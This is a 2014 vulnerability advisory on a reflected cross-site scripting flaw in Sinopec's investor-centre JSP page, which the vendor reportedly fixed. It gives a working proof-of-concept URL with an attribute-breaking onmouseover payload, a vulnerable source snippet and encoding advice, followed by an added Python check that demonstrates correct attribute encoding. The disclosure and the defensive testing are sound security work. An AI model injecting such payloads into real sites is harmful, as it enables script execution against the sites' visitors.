SINOPEC Cross Site Scripting

2014.02.20
Credit: NicholasL
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

   _____  .___  _________
  /  _  \ |   |/   _____/
 /  /_\  \|   |\_____  \
/    |    \   |/        \
\____|__  /___/_______  /
        \/            \/
                corporation

China's Petroleum & Chemical Corporation, (SINOPEC Limited)
============================================================

Published Report: 19/02/2014
Credits: Advanced Information Security Corporation, USA
Severity: High/Critical (OWASP TOP 10)
Type: Web Application / Reflected Cross-Site Scripting Attack.
Author: Nicholas Lemonias. (Information Security Expert)

Vendor Overview
===========================

China Petroleum & Chemical Corporation, or Sinopec Limited, is a Chinese oil and gas company based in Beijing, China. It is listed in Hong Kong and also trades in Shanghai and New York. Sinopec is the world's fifth biggest company by revenue. Sinopec Limited's parent, Sinopec Group, is one of the major petroleum companies in China, headquartered in Chaoyang District, Beijing.

Sinopec's business includes oil and gas exploration, refining, and marketing; production and sales of petrochemicals, chemical fibers, chemical fertilizers, and other chemical products; storage and pipeline transportation of crude oil and natural gas; import, export and import/export agency business of crude oil, natural gas, refined oil products, petrochemicals, and other chemicals.

In 2011 it ranked as the 5th largest company in sales in Forbes Global 2000. In 2009, it was ranked 9th by Fortune Global 500, becoming the first Chinese corporation to make the top ten, and in 2010 it was ranked 7th. In 2007, it ranked first in the Top 500 Enterprises of China ranking. Sinopec is the largest oil refiner in Asia by annual volume processed. Sinopec produces around 1/4 as much raw crude oil as PetroChina, but produces 60% more refined products per annum. Sinopec has an astonishing revenue of 2.786 trillion CN income.

Responsible Disclosure Timeline
======================================

[+] 21st of December 2013 - Contacted Vendor regarding the security realisation.
[+] 25th of December 2013 - The Vendor verified & fixed the problem.

Description of the security realisation
=========================================

Visitors and users alike trust the provider's website by default. The investor center directory in the public-facing online environment is vulnerable to a reflected cross-site scripting attack, and visitors to the site could be affected by this vulnerability.

A page that lets investors search the company's stock-exchange share prices is vulnerable to an input validation vulnerability. The path fragment /investor_center/historyQuery.jsp does not filter metacharacters from user input and allows injection and execution of third-party heterogeneous code through the hidden POST request.

The problem leads to the reproduction and execution of third-party untrusted code, thus exploiting the trust levels and Confidentiality, Integrity and Availability as per the requirements of best security practice and standards (ISO 27001).

Proof of Concept (1) / Affected Services
==========================================

http://english.sinopec.com/investor_center/historyQuery.jsp?d=%22%20onmouseover%3dprompt%28313372%29%20abc%3d%22&dayend=23&daystart=23&doSearch=true&endDate=2012-03-06&gid=1&monthend=3&monthstart=3&range=1&startDate=2000-10-19&Submit2=search&yearend=1967&yearstart=1967

Affected directory/script: /investor_center/historyQuery.jsp

Injected code to path fragment:

/investor_center/historyQuery.jsp?d=%22%20onmouseover%3dprompt%28313372%29%20abc%3d%22"

1. Escaping previous fragment function:

2. Injection:

/investor_center/historyQuery.jsp?d=%22%20onmouseover%3dprompt%28313372%29%20abc%3d%22&dayend=23&daystart=23&doSearch=true&endDate=2012-03-06&gid=1&monthend=3&monthstart=3&range=1&startDate=2000-10-19&Submit2=search&yearend=1967&yearstart=1967

Description: When the mouse moves over the affected link, the injected code is executed. In this proof of concept a prompt alters the user's normal execution flow, and thus confidentiality, integrity and availability are impacted.

Proof of Concept (2)
==========================================

POST /investor_center/historyQuery.jsp HTTP/1.1
Content-Length: 209
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=abcrPc-q2uTfoa0OsvLxt
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/7.54 (Windows NT 5.1; U) [en]

Limitations Source Code (sample A)
==============================================

<INPUT type=hidden name=doSearch value="true">
<input type="hidden" name="d" value=" onmouseover=prompt(973979) bad="> // line 8701 execution of the vulnerable

Recommendations provided for Quality of Service
===============================================

A. The recommendations made to Sinopec Ltd were in good faith and in support of the quality of service. The technical recommendations are to consider encrypting the view-state of the application and to implement stronger Cross-Site Scripting protection. XSS filtering is apparently not properly applied: the metacharacter filtering lets input data through over the HTTP protocol and gives the ability to inject untrusted third-party heterogeneous code, whether in JavaScript, ActiveX or Visual Basic Script. Please note that malicious users could take advantage of such a bug, as we have seen in notable cases of malware and propagation instances.

B. Our consultation to Sinopec Ltd was therefore for an immediate risk assessment and an immediate review of upper-level security policies in accordance with ISO 27001 and ISO 27002, which was followed kindly by the team, together with a full review of the ISMS policy scope and the SDLC of the vulnerable application and other subsidiary pages.

Appendices
============================

A. Suggested the filtering of metacharacters.

B. Suggested the utilisation of user-server encoding of < and > to &lt; and &gt; in application output.

C. An XSS attack could embrace mass user and product attacks, phishing, and theft of private and confidential information such as credit cards, passwords, and stored accounts.

D. Suggested filtering < and > and using appropriate encoding: ( and ) filtered and encoded to &#40; and &#41;. Example: # and & converted to &#35; (#) and &#38; (&).

References
============================

OWASP. 2013. Cross Site Scripting (XSS) attacks. [ONLINE] https://www.owasp.org/index.php/Cross-site_Scripting_(XSS), 2011.

OWASP. 2013. XSS Filter Evasion Cheat-Sheet. [ONLINE] https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet?, 2013.

Microsoft. 2011. Protecting against XSS attacks. [ONLINE] Available at: http://msdn.microsoft.com/en-us/library/ff649310.aspx.

** This vulnerability report is posted for the wider benefit of the security community, as is and without any warranties, including that of the warranty of merchantability and capability fit for a particular purpose. The information is posted under the FOI as per best security practices.

*Copyright Advanced Information Security Corp ©, 2014*
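Added example, not part of the original advisory or of the vendor's code: the hidden "d" field from the source sample is rendered three ways and checked with an HTML parser. It shows that encoding only < and > (Appendix B) leaves this payload effective, because the double quote is what closes the value attribute. The function names and the template string are assumptions that model the JSP output described above.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import unquote

# Value of the "d" parameter from the advisory's proof of concept, URL-decoded.
PAYLOAD = unquote("%22%20onmouseover%3dprompt%28313372%29%20abc%3d%22")
# Assumed template, modelled on the hidden input in "Source Code (sample A)".
TEMPLATE = '<input type="hidden" name="d" value="{}">'


def render_unencoded(d):
    """Behaviour the advisory describes: the parameter is echoed as-is."""
    return TEMPLATE.format(d)


def render_angle_only(d):
    """Encodes only < and >; a double quote still closes the attribute."""
    return TEMPLATE.format(d.replace("<", "&lt;").replace(">", "&gt;"))


def render_encoded(d):
    """Attribute-context encoding: &, <, >, double and single quotes."""
    return TEMPLATE.format(escape(d, quote=True))


class _AttrCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = dict(attrs)


def parsed_attributes(markup):
    """Attributes an HTML parser sees on the rendered <input> element."""
    collector = _AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.attrs


def injects_handler(markup):
    """True if the element gained an event-handler (on*) attribute."""
    return any(name.startswith("on") for name in parsed_attributes(markup))


if __name__ == "__main__":
    for render in (render_unencoded, render_angle_only, render_encoded):
        print(render.__name__, injects_handler(render(PAYLOAD)))
```

With full attribute encoding the parser recovers the payload as inert text inside value, so the same check can serve as a regression test for any field that reflects request parameters.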

